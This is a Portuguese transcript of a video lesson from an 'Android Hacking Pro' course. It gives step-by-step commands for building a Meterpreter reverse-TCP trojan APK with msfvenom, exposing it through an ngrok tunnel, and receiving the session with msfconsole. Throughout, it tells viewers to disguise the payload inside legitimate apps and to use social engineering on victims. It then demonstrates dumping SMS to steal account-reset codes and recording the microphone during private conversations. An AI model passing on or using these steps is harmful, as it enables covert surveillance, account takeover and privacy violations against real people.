Fala pessoal, sejam bem-vindos a mais uma aula do curso Android Hacking Pro. E essa daqui é uma aula bônus que eu não vou só mostrar como hackear com o seu celular, hackear sistemas a partir dele, e sim eu vou mostrar como hackear outros celulares utilizando o seu celular. Como assim? Nessa aula aqui eu vou te mostrar técnicas para você criar aplicativos, APKs, que é possível de instalar em outros celulares e você pode ter acesso total a eles, controlar eles à distância. Como se fosse um vírus de computador, que você consegue pegar arquivos, ver câmera, ver diversas coisas e executar diversas funções nele. E eu vou mostrar como fazer isso utilizando o nosso celular. A gente vai criar um aplicativo infectado e com ele a gente vai conseguir hackear outros celulares. Mas antes seria interessante eu mostrar como que isso vai acontecer. Como assim? Você hackeia um celular a partir de outro? Como que é feita essa conexão? Como que isso acontece por trás dos panos? Que entendendo isso, você vai conseguir criar na sua cabeça a base teórica para entender, ok, então eu preciso de um vírus, esse vírus ele tem que ser conectado por meio de uma porta em um celular, tem que ter permissões, como que funciona isso? Então vamos lá, eu estou aqui na tela do meu celular, e aqui na tela eu estou com o meu bloco de desenho aqui, que ficaria melhor de explicar para vocês. E como que é feita a conexão de dois celulares quando você hackeia ele, por exemplo. Vamos supor que a gente gerou aqui, eu mostrei para vocês, como gerar um aplicativo infectado, um APK. Então, a gente vai ter aqui o aplicativo infectado. E você foi lá e enviou ele para alguma pessoa ou algum amigo seu. Depois que essa pessoa clicar no aplicativo, o que vai acontecer? Como que funcionam vírus? Desde vírus de computador até vírus de celular. Eles funcionam meio que da mesma forma. Quando essa pessoa clica nesse vírus, esse vírus ele é instalado no celular dela, né? Obviamente, como qualquer outro aplicativo, quando você instala o YouTube, ele fica dentro do seu celular. Só que a diferença é que o aplicativo do YouTube, por exemplo, ele se conecta no servidor do YouTube. Ele se conecta em vídeos. Quando você clica em um vídeo, ele vai lá, se conecta no servidor do YouTube e te mostra o vídeo. A diferença é que esse aplicativo aqui não vai se conectar em um servidor de algum site especificamente. Ele vai se conectar no hacker. E, tendo conectado no hacker, você pode, desde pegar arquivos, enviar arquivos, ver conexões, ver a câmera, porque vamos supor, vai funcionar da mesma forma que o próprio YouTube. Eu já estava dando o exemplo do YouTube, né? Que quando você instala o aplicativo do YouTube, ele entra no sistema e ele se conecta no servidor da Google, onde tem os vídeos. Quando você upa um arquivo no YouTube, o que acontece? Você dá a ele acesso aos arquivos. Quando você baixa um aplicativo, você tem que clicar na permissão, lembra? Permitir acesso a arquivos, permitir câmera, permitir tal coisa. Esse aplicativo aqui, ele vai perguntar essas permissões. Mas talvez esse aplicativo também possa estar disfarçado de algum outro aplicativo inocente e essa pessoa clique nas permissões, como se ela clicasse em permitir acessar os arquivos no YouTube. E quando você envia um vídeo para o YouTube, por exemplo, você pega um arquivo do seu celular e envia para o banco de dados. O vírus faz a mesma coisa, só que ao invés de a pessoa que ir lá clicar em upar um vídeo do YouTube e mandar, ele faz isso automaticamente. Quando você instala um Trojan, um vírus, ele automaticamente pede a permissão dos seus arquivos. Quando você concede ela, ele pega todos os vídeos e fotos que tem no seu celular e manda pro atacante, pro hacker. Da mesma forma que você manda um vídeo do YouTube pro servidor do YouTube, mas nesse caso sem a consciência da pessoa que foi hackeada. E é assim que é feita a conexão. Especificamente, a conexão ela é feita, a gente já viu aqui nas aulas o conceito de URL, de domínio e de IP, né? Que praticamente é a mesma coisa, um IP, um domínio está em um IP e uma porta. E esse vírus também se conecta em um IP e uma porta, que no caso vai ser a porta do hacker. Ele vai ter que abrir uma porta para a internet toda, para quando essa pessoa clicar no aplicativo, ele se conectar a essa porta, como se fosse um servidor. E assim poder enviar fotos confidenciais e executar diversas funções no celular da vítima. A gente vai ver isso na prática agora. E com qual ferramenta que a gente vai fazer isso? A gente vai fazer isso com uma ferramenta chamada Metasploit. Não no caso separado, não é Metasploit, e sim Metasploit.
E essa ferramenta, ela é como se fosse um hub de ferramentas para hackear dispositivos. E ela é capaz de criar vírus, criar backdoors para diversos sistemas operacionais. Seja para Linux, seja para Windows, seja para Android, seja para várias coisas, ele consegue criar um vírus para esse sistema. E não só o vírus, ele também consegue se conectar a esse vírus e fazer toda essa conexão que eu estou explicando para vocês, a gente pode fazer utilizando o Metasploit. E para a gente fazer isso, a gente vai instalar o Metasploit no nosso celular utilizando o Termux. Mas antes de mostrar para vocês, antes de instalar, eu queria listar duas ferramentas específicas do Metasploit que a gente vai usar. A primeira ferramenta vai ser o MSF Venom. Tipo o Venom do Homem-Aranha, lembra? Eu acredito que foi uma boa referência, porque em algum episódio do Homem-Aranha, quando você tocava no Venom, ele meio que tomava conta do seu corpo e ele virava o Homem-Aranha do mal. Não lembro como que era esse filme. Mas no caso, ele vai agir da mesma forma. Quando a pessoa clicar em um aplicativo, ele vai tomar conta do celular dela. Então, com o MSF Venom, a gente vai conseguir entrar dentro do celular das pessoas, criar esse APK, esse aplicativo que as pessoas vão instalar e vai infectar o celular delas. Mas aí a gente vai ter somente o aplicativo. Ok, como que a gente vai se conectar a ele? Como que a gente vai entrar no celular da pessoa? Para isso, a gente vai utilizar o MSF Console, que vai ser o console do Metasploit que a gente vai usar para se conectar no vírus que a gente criou, no vírus que foi criado pelo MSF Venom. Então essas são as duas ferramentas que a gente vai usar. E bora lá, sem mais delongas, bora instalar o Metasploit no nosso celular. Para instalar, ele vai ser da mesma forma que a gente instala outros aplicativos, pesquisando Metasploit GitHub. Então a gente vai pesquisar aqui Metasploit GitHub e abrir o primeiro, o Rapid7 Metasploit-Framework. Aqui vai ter todas as informações sobre o Metasploit, como utilizar ele, mas eu vou ir junto com vocês para a gente instalar. Uma informação importante é que ele está instalado, ele funciona, ao invés de Python, que a maioria dos aplicativos está rodando, ele foi criado em Ruby. Então a gente vai utilizar as ferramentas de Ruby para rodar ele. A ferramenta que é chamada de Bundle. Então, primeiramente, bora colocar esse aplicativo no nosso celular. Então vamos vir aqui, copiar a URL aqui do GitHub, copiar ela, vir aqui no Termux e colocar git, olha essa aqui, tá, tô na pasta certa, git clone e clonar o Metasploit. Então quando você dá Enter, ele vai começar a fazer o download do Metasploit. Então esperar um tempinho para ele baixar tudo, para a gente poder baixar todas as dependências do Ruby e depois executar o MSF Venom e o MSF Console. Então ok, acabou de instalar o Metasploit no nosso celular e vamos entrar dentro da pasta dele. Então a pasta vai ser Metasploit Framework. Vou entrar aqui, Metasploit Framework e vamos limpar aqui. Agora, lembra que eu falei que ele foi criado em Ruby? Então, para a gente poder instalar, a gente vai ter que instalar o Ruby também, utilizando o pkg install Ruby. Então, vamos colocar pkg install Ruby e ele vai começar a instalar o Ruby também. Nesse caso, ele já está instalado no meu celular, que eu testei anteriormente, mas no seu caso, ele vai te perguntar se você quer instalar, você coloca Y, e aí vai estar funcionando. E agora a gente vai usar o chamado Bundle para instalar o nosso Metasploit. Então, primeiramente, vamos atualizar o Bundle. Para atualizar ele, eu vou utilizar o Bundle update bundler. Bundle update bundler. Então eu vou dar Enter e ele vai começar a fazer o update no próprio bundle, que é o instalador do Ruby. Então ele vai começar a instalar. Quando você instala somente o bundle install, ele vai dar alguns erros. Então você pode tentar instalar com o bundle install já direto, mas recomendo você atualizar ele. Então ele vai começar a pesquisar várias coisas. Quando estiver dando erro também, depois de você já ter instalado ele, já ter utilizado, roda novamente o bundle install, o bundle update no caso. Então ele acabou de instalar o nosso bundle, eu fiz a instalação dele e o update.
E agora chegou a hora da gente utilizar essas ferramentas. Se você vir aqui e colocar ./msfvenom aqui, ./msfvenom e der Enter, ele vai meio que abrir o aplicativo. Então ele vai abrir o aplicativo e te dá várias opções que ele tem. A mesma coisa com o MSF Console. Se você abrir ele, ele vai abrir, ele demora um pouco mais para abrir. Então eu vou parar aqui dele abrir, porque a gente vai utilizar o MSF Venom por enquanto. Então vamos lá, eu vou colocar MSF Venom. E agora chegou a hora da gente configurar ele para gerar um APK infectado. O MSF Venom, como eu disse, ele gera várias coisas. Ele gera desde aplicativos de Windows, de Linux, de Android, de várias coisas. Então a gente vai ter que configurar ele para gerar um aplicativo de Android. E também fazer a conexão. E para fazer isso, ele é o seguinte comando: msfvenom-p android /meterpreter /reverse tcp. Ok, essa é a configuração para ele criar um aplicativo de Android. Então, Android meterpreter reverse tcp. Agora a gente vai ter que configurar em qual celular, em qual alvo, no caso o hacker, que ele vai se conectar. Então, para fazer isso, a gente vai definir aqui, ó, lhost igual a algum IP e lport igual a alguma porta. Mas qual IP e porta vai ser essa? Vai ser o IP local do seu celular? Vai ser um domínio? O que vai ser? Para a gente conseguir fazer isso e se conectar com pessoas que estão fora da rede, inclusive, a gente vai utilizar o ngrok, que é uma ferramenta que ela gera um servidor para você, para as pessoas que estão no mundo todo poderem se conectar. A gente utilizou o ngrok em uma aula, o aplicativo, no caso, ele utilizava o ngrok, em uma aula que a gente subia um site de phishing, um site falso que as pessoas podiam se conectar e ele roubava os dados delas. E vai funcionar da mesma forma, a gente vai subir um site aqui para o nosso alvo se conectar e a gente conseguir hackear ele. E agora, o que a gente vai fazer? Você vai deixar isso aberto, esses comandos, se você já digitou eles, deixa aberto aqui. Aí o que você vai fazer? Você vai vir e arrastar para o lado. Então você vai vir aqui no seu celular, arrastar ele para o lado, tirar o teclado no caso, arrastar para o lado. Caso você não consiga arrastar para o lado com um dedo, você pode tentar com dois. Depende muito da configuração do seu celular. E aí você vai clicar aqui em New Session. O que isso vai fazer? Vai gerar um novo terminal. A gente pode criar diversos terminais no nosso celular. E para fazer uma conexão a outro celular, a gente vai ter que fazer isso. A gente vai ter que criar o servidor, criar o vírus, criar o que vai receber a conexão. Então a gente vai ter que criar vários terminais. E aqui dentro, a gente pode voltar à pasta e a gente vai instalar o nosso ngrok. Para instalar o ngrok, a gente pode vir aqui no Google, pesquisar ngrok, vir aqui, e a gente pode criar uma conta aqui dentro dele. Então, indo no ngrok.com no Google, você vai clicar em Sign Up for Free. Então, é grátis para criar a conta, só algumas funções que são pagas, mas você não vai precisar utilizá-las aqui. Então, primeiro a gente coloca o nome, username. No caso, eu já tenho uma conta, então só vou logar nela aqui. Ok, acabei de logar na minha conta, aqui utilizando o ngrok e o Google. E aqui dentro, a gente vai fazer a instalação dele. Então, nesse caso, aqui do lado, posso até fechar esse painel, aqui vai ter a forma que a gente pode instalar. Para instalar ele, a gente vai vir na instalação de Linux. Nesse caso, Linux ARM64. Então, eu vou clicar aqui, Linux ARM64, e a gente vai baixar ele, salvar ele nos downloads. E aí, o que a gente vai fazer? A gente vai pegar aqui, e nos arquivos, e acessar o download que a gente acabou de fazer. Então, nesse caso aqui, ó, ngrok, a gente vai selecionar esse arquivo, e a gente pode colocar ele em algum outro local. Vamos clicar em Move To, seleciona ele, clica nos 3 pontos, clica em Move To, e vamos mover ele lá para o Termux. Vamos vir aqui, clicar em Move. Então acabamos de mover ele. Então você entra no aplicativo de pasta que você tenha. Caso você não tenha nenhum aplicativo de pasta, que é meio estranho no Android, você baixa um aplicativo de navegação, de pasta, para poder mover esses arquivos. Com o nosso ngrok aqui, a gente vai precisar descompactar ele. Ele, nesse caso, está num TGZ. E agora, esse TGZ é como se fosse um ponto zip, como se fosse um ponto rar nos computadores. Como se fosse uma pasta compactada.
E agora a gente vai ter que descompactar ela. E a gente vai descompactar ela utilizando o comando do próprio Thermos, chamado tar menos xvzf. Tar menos xvzf. Lembre esse comando que você vai utilizar ele para descompactar todos os arquivos que você for utilizar, que vem no modelo .tgz. Então, nesse caso, eu vou selecionar ele, e aqui tar, e eu vou dar Enter. Agora, com ele descompactado, a gente vai ter um arquivo aqui chamado ngrok. Esse arquivo aqui. E agora é ele que a gente vai executar. Eu vou dar um ponto barra ngrok para executar o ngrok. Então, um ponto barra ngrok. E olha só, se ele nos deu a instrução de vários comandos, quer dizer que ele está rodando tranquilamente. Só que esse ngrok aqui, ele não está configurado. Esse ngrok ele precisa estar logado na sua conta para poder utilizar. Então, nesse caso, a gente pode vir aqui e conectar ele. Ele já dá um comando automático que vai logar na sua conta. Então, a gente copia esse comando aqui no segundo passo. Então, quando você vem aqui na instalação, você vem aqui para baixo. Segundo passo, conecte sua conta. Tem aqui ponto barra ngrok. Coloca só ponto barra, que aí é só você colar o ngrok aqui. Então, no caso, no comando dele não tem o ponto barra no início. Então, vamos dar Enter. E ok. Vamos ver. Dando Enter nesse comando aqui, ele vai falar aqui, ó, auth token saved to configuration file. Então quer dizer que o token ele está salvo no arquivo de configurações e a gente já tem meio que a seção criada aqui no nosso ngrok. E para utilizar ele também, muito simples, vamos dar ponto barra ngrok help. Colocando ngrok help, ele vai nos dar todos os comandos. E qual comando que a gente vai ter que utilizar? Existem dois comandos. O ngrok http, que cria um site, e o ngrok tcp, que cria uma conexão TCP, que é uma conexão direta, não tem site, não tem nada. É uma conexão direta entre dois dispositivos. E no caso é ela que a gente vai fazer. Se a gente até vir aqui na outra seção, a gente tem aqui, ó, reverse TCP. Então a gente vai ter que criar um TCP utilizando o ngrok. Então vamos lá. Vou vir aqui, voltar na minha outra seção e colocar ngrok clear ponto barra ngrok TCP e a porta que você quiser. No caso, vou colocar a porta 456, por exemplo. ngrok TCP 456. E ele acabou de iniciar aqui. Aqui na porta, ele vai te dar duas coisas importantes quando ele iniciar. Caso você não consiga ver, você pode tirar um pouco o zoom da tela ou colocar na horizontal, por exemplo. Mas ele vai te dar aqui o nosso, aqui ó, TCP, isso daqui. Você copia essa informação aqui do lado do forward. Então vamos vir aqui forward, copiar essa informação. Ok, copiei aqui essa URL do lado do forward. E agora eu vou colar ela no bloco de notas para você ver melhor. Então eu vou vir aqui no meu bloco de notas. Essa daqui é a URL que a gente vai precisar no nosso Nmap, no nosso Metasploit. Tá aqui, ó, ngrok tcp 0.tcp.sa.ngrok.io. Essa vai ser a URL que a gente vai colocar dentro do nosso Metasploit. Então eu vou selecionar ela e colar ela aqui. Vai ser no caso o lhost, como a gente selecionou. Então vamos vir copiar essa URL. Copiar. E podemos vir aqui e colar aqui no nosso lhost. Substituir nosso lhost por essa URL. Então vamos vir aqui, voltar um pouco, usando as setinhas, e colar isso daí. .io, tá faltando o nosso... Tá faltando um O no final. Vou pegar aqui. .io. E agora vamos colocar a porta também, que vai ser o número. Depois dos pontos a gente tem o número. Aqui ó, esse número aqui. Então a gente vai pegar esse número, o 13056, vamos cortar ele e colar ele aqui. Então vai funcionar dessa forma. O lhost vai ser a URL que foi passada aqui pelo Nmap no forward. E a nossa porta vai ser essa porta aqui. Essa porta que tem no Nmap, os números que tem após ele. Com isso,
a gente já pode criar o nosso APK. A última coisa que a gente vai ter que colocar aqui é o nome dele. Então, para colocar o nome dele, o nome que a gente quer, que a gente cria o nosso aplicativo infectado, a gente vai colocar uma setinha pro lado, espaço, setinha pro lado, e o nome dele. Então, vou colocar aqui tdi app.apk. É muito importante você colocar apk no final, .apk. Você pode colocar qualquer nome, tdi, teste, qualquer coisa, mas coloca um apk no final. Fazendo isso, você pode dar Enter e ele vai começar a criar nosso aplicativo infectado. Uma outra dica aí, caso você tenha o APK de algum outro aplicativo, então você pode baixar diversos APKs, né? Você pode vir aqui no Google, por exemplo, e vir aqui e baixar. Eu dei aquele exemplo do YouTube, youtube.com, YouTube APK, download. Você pode baixar o APK de vários aplicativos aqui também. Por exemplo, YouTube APK download. Você pode baixar ele aqui. E você também pode utilizar ele para utilizar o MSF Venom para infectar um aplicativo específico. Nesse caso, eu criei um aplicativo zerado que vai ter um único intuito de hackear o celular da pessoa. Mas caso você queira camuflar ele um pouco, você pode utilizar, ao invés do nosso MSF Venom "-p", que você coloca o comando, você coloca antes "-x" e o nome do APK que você quer selecionar. No caso, olha aqui, ó, ele já selecionou OK, Android, Payload, já criou ele. Eu vou mostrar um pouquinho mais pra frente como infectar um aplicativo específico. Mas o nosso aplicativo aqui, nosso aplicativo falso criado, ele está aqui, tdiapp.apk. E você pode acessar ele também vindo nos seus arquivos, vindo em Files, aqui Termux, e a gente tem ele aqui, ó. Vamos achar ele. Cadê? Ah não, ele está dentro do nosso Metasploit. Aqui, ó, Metasploit Framework. Vou entrar dentro da pasta e tdiapp.apk. E o que você vai fazer com esse aplicativo? Você vai compartilhar para quem você quer atacar. Lembrando que você tem que estar com o ngrok ativado, com o ngrok naquela URL. Caso você feche o ngrok, ele vai perder a conexão e criar uma nova URL diferente. Porque a gente não está com um plano pago que mantém sempre a mesma URL. Se você quiser utilizar a mesma URL, você paga o ngrok, se eu não me engano, alguns dólares por mês, é um plano mensal. Mas caso você não queira pagar o ngrok, sobe o ngrok no seu celular, deixa ele aberto, cria o APK naquelas URLs e portas, e aí ele vai estar aqui, ele vai estar criado. E agora é o seguinte, você pode selecionar ele e clicar em compartilhar, por exemplo, para compartilhar com as pessoas. Então eu vou mandar ele para algum outro celular aqui, que a gente vai pegar esse celular e vai utilizar ele para seu alvo, né? Essa pessoa que a gente vai infectar. Então, vou pegar aqui e já volto. Então, nesse momento, eu tô com o APK em um outro celular aqui. Mas antes de eu pegar ele e abrir o aplicativo, a gente tem que configurar o MSF Console, que vai ser um aplicativo que a gente vai utilizar para pegar essa conexão. Então, vamos lá. Vou dar um clear aqui e vamos dar um ./MSF Console. Dessa vez, a gente não vai precisar dar nenhum parâmetro, porque o MSF Console ele é mais interativo que o MSF Venom, e a gente pode simplesmente selecionar as opções. Mas a gente ainda vai ter uma configuração que a gente vai ter que fazer aqui, e eu vou fazer junto com vocês. Então eu vou clicar aqui em MSF Console, e a gente vai abrir ele, ./MSF Console. Lembrando que você tem que estar dentro da pasta do Metasploit. Então, colocando esse comando, ele vai começar a iniciar, ele demora um tempinho, ele tem que subir um banco de dados para iniciar, então eu vou deixar ele iniciar aqui. Aqui, ó, Starting Metasploit Framework. Iniciando. E pronto, ele acabou de iniciar. Você pode ver que a gente tem um desenho aqui de um M gigante. Aqui, ó, um coração com um M. E a gente entrou aqui no console dele. Como eu disse, é um console. A gente ainda mesmo dá algumas linhas de comando para ele. E eu vou pegar aqui as linhas que a gente vai precisar dar para configurar ele. Então, vamos vir aqui. E olha só. Para utilizar aquela função específica de conectar em celulares, conectar em conexões, a gente vai vir aqui e colocar use exploit multi handler. Exploit multi handler. Eu vou dar enter aqui e ele vai configurar isso daqui. Nesse caso, ele já falou de início que ele está usando uma configuração genérica de payload. Então aqui, ó, generic shell reverse shell TCP.
E a gente não pode usar uma conexão genérica. A gente tem que utilizar uma conexão de Android. Então a gente vai colocar literalmente a mesma coisa que a gente tinha, que a gente passou lá pro nosso MSF Venom. A gente vai colocar aqui, deixa eu pegar o comando de novo, Android Meterpreter Reverse TCP. Então eu vou colocar aqui, ó, set payload Android Meterpreter Reverse TCP. Set payload Android Meterpreter Reverse TCP. E ele acabou de ser configurado. A gente também vai ter que colocar aqui o nosso domínio, o nosso L-host, a nossa porta, que ele vai ouvir. Nesse caso, vamos voltar aqui para o nosso ngrok para ver uma coisa. Então, vamos vir aqui, ngrok, e entrando aqui no ngrok, a gente pode ver, aqui, ó, vou aumentar a tela aqui, olha só, forwarding, lá pequenininho, ó, forwarding a URL que a gente usou, a porta, e tem uma setinha enviando para localhost 456. A gente vai colocar exatamente isso. A gente vai voltar aqui no Metasploit. Então, eu vou vir aqui, Metasploit, e a gente vai colocar o localhost, o endereço local. Nesse caso, eu vou colocar 0.0.0.0. 4 zeros, no caso. Que é uma forma de você identificar o endereço local. Você pode utilizar o termo localhost 0.0.0.0 ou 127.0.0.1. São essas três formas que você pode identificar o endereço local. E lembrando que caso uma não funcione, você pode utilizar a outra. Então, vou utilizar essa porque normalmente essa para mim dá menos erro. E para fazer isso, para setar o L-host, é a mesma coisa do payload. Set L-host. E aí, 0.0.0.0. Pronto. E a porta. Set L-port. É a mesma porta que a gente configurou no início, né? Então, eu também posso colocar aqui, ó, Show Options. Aqui, ó, para mostrar o que precisa. Então, aqui, ó, L-host, L-port e também o payload. Nesse caso, vamos vir aqui. Vamos setar de novo a L-port, que o nosso L-host já está conectado. Set L-port para 456, certo? Vou confirmar aqui. Vamos ver. Aqui a gente tem 456, exatamente. Então a gente pode voltar aqui para o nosso Metasploit. E agora que está tudo configurado, para a gente iniciar esse comando aqui, a gente vai ter que colocar simplesmente Run. E ele vai iniciar. Então vamos lá. Vou clicar em Run. Então vamos lá, vamos fechar ele de novo e rodar ele como root agora. Então vamos fechar ele, clicar em Exit, e a gente vai utilizar o comando tsu para ficar como root. Ok, agora estamos como root, vamos utilizar o mesmo comando daquele, ./msf console. Aqui, ele pediu, aqui deu um erro quando estava com root, ele pediu para você colocar gitconfig global add safe directory. Então eu vou colocar esse comando que ele nos passou. Então vamos vir aqui, selecionar isso daqui para copiar. Ah não, na verdade, acho que ele já iniciou. Vou fechar ele só para colocar o comando. Calma aí. Vou colocar o comando aqui. E pronto. Coloquei o comando. Vamos rodar de novo. Agora não deu nenhum problema. Então se aparecer essa mensagem aqui no início, você copia o comando aqui e aí roda. gitconfig -global -add safe directory, várias coisas. Agora é esperar ele iniciar. Então vamos esperar o MSF console iniciar aqui. Ok, voltamos no nosso MSF console e eu vou redigitar todos os comandos que eu digitei anteriormente. Então use e tal, setar o lhost e por último setar lport. 456. Pronto. Vamos novamente mandar um run. Então run. E olha só, ele iniciou um reverse TCP render, que vai ser a parada que a gente vai utilizar para conectar nesse celular. Agora chegou a hora de pegar ele. Então, vou pegar ele aqui e a gente vai abrir o aplicativo dentro dele. E olha só, quando você abre o aplicativo no seu celular, o que ele pede? Ele pede várias informações aqui. Então,
Caso você tente alterar o nome dele, tente ofuscar ele em outro aplicativo, é mais provável que a pessoa aceite. Ou caso ela não veja essas informações, ela simplesmente clique em aceitar. Fazendo isso, você vai ter acesso a tudo que tem aqui. Então vamos lá. Localização, celular, SMS, microfone, contatos, câmera, arquivos e histórico de chamadas. Vamos clicar em continuar. Acabou de ser feita uma conexão no nosso Metasploit, nosso MSF console. E a gente tem aqui ó, uma conexão aberta. Vamos tentar ver aqui, show options. Vamos dar um help, na verdade. Aqui, é help comando. Olha tudo que a gente pode fazer. É incrível. Olha só. Arquivos de execução de arquivos. File System Commands. A gente pode acessar os arquivos do celular, as fotos, todas as fotos que a pessoa tem. Caso ela clique 2 vezes naquele botãozinho de aceitar, você tem acesso a tudo. E nesse ponto já vai entrar muito a chamada engenharia social. Então, qual que é o motivo dela instalar o aplicativo? É uma coisa importante? Teve um motivo ou você só enviou para ela do nada? Porque caso uma pessoa receba um aplicativo do nada, muito provável que ela não abra. Mas caso uma pessoa receba um aplicativo por algum motivo específico, algum aplicativo infiltrado em outro aplicativo também, que eu vou mostrar, é mais provável que ela abra. Tem que ter um motivo, uma história por trás disso. E com esses simples comandos, a gente pode ver tudo aqui. File System, Network, a gente pode ver comandos de rede, comandos do sistema, interface, a gente pode dar um screenshot do celular. Webcam Commands, a gente pode gravar o microfone da pessoa. Áudio, a gente pode dar play no áudio que a gente gravou. Android aqui tem muitos testes que a gente tem aqui, que a gente pode fazer. Eu vou mostrar agora uma função que é utilizada por muitos hackers para hackear redes sociais. Muitas vezes, quando você loga em uma rede social importante, como por exemplo o Google ou o Instagram, ele exige uma verificação por SMS. Até, por exemplo, para redefinir a senha de uma rede social. Vamos supor que essa pessoa abriu o seu aplicativo e você quer tentar logar na conta dela. E aí você pede um código de redefinição de senha, que vai chegar no SMS dela. Utilizando o comando dump-sms, ele vai salvar em um arquivo de texto todas as mensagens que essa pessoa recebeu. Caso você queira salvar, tentar recuperar a senha dela e acessar o SMS dela para ver o código, você pode. Por exemplo, aqui dentro só tenho um SMS. 3.500, você receberá em instantes algumas mensagens para configurar nossos serviços, tal. Nesse caso aqui, eu acredito que não tenha número nesse celular, se eu não me engano. Então ele só me mandou essa mensagem. Mas bora tentar abrir o aplicativo de texto, o arquivo de texto que ele gerou. Vamos lá. Abrir uma vez. E, olha só. SMS Messages Dump. A data, o celular, o IP e address 35.000 no caso. Você receberá em instantes algumas mensagens para configurar nosso serviço de internet. Exatamente a mensagem que eu recebi no meu SMS. Que provavelmente, se você recuperasse a conta dessa pessoa, você poderia acessar todos os SMS e mensagens dela. Vamos tentar ver mais outras coisas. Olha uma coisa interessante também. Caso você queira, por exemplo, aumentar os seus privilégios ou tentar fazer alguma coisa específica, você pode instalar um outro aplicativo no celular dela a partir do aplicativo que está hackeado, a partir do aplicativo que hackeou o celular dela. Então você pode desde listar aplicativos, rodar os aplicativos ou até de instalar eles. Vamos, por exemplo, listar os aplicativos que tem nesse celular. Então vamos vir aqui, App List. E olha o tanto de aplicativo. E o último comando que eu queria mostrar para vocês é o comando de Record Mic. É um comando que é capaz de gravar o microfone do celular, caso a pessoa esteja em uma conversa particular ou caso você só esteja curioso do que ela está falando. Para fazer isso, você vai colocar aqui, Record Mic. E aí, você vai colocar,
menos, por exemplo, menos 10. Ele vai gravar 10 segundos. Então assim que vai funcionar o comando de record mic. Sempre defina um tempo. Se você não definir, ele vai gravar 1 segundo ou 0 segundos e vai dar errado. E aí, fazendo isso, você já consegue mandar pra ele, ele vai começar a gravar 10 segundos. 1, 2, 3, terminou aqui. E aí, vamos ver. Vamos abrir no nosso celular, né? Aqui, ó, UKT, vamos procurar um UKT aqui. Você pode abrir pelo seu aplicativo de arquivos mesmo. Aqui, ó, UKT, esse. E aí quando você abrir, ele vai abrir já com o tamanho da gravação que você gravou. Então ele vai gravar essa gravação aí durante 10 segundos. Então espero que vocês tenham curtido essa aula. Tentei mostrar aqui desde a instalação do MSF Venom, como você pode criar um payload com ele, como instalar o Metasploit e o MSF Console para fazer uma conexão. A gente fez uma conexão aqui na prática e eu mostrei diversos comandos que você pode dar. Por exemplo, o comando de SMS, você pode pegar todos os códigos de verificações de uma pessoa. É um comando poderoso. O comando, por exemplo, de gravar o microfone, você pode ver o que a pessoa está falando. Então, espero que vocês tenham curtido essa aula. Lembrando, use com responsabilidade. Eu te vejo em uma outra aula. Falou!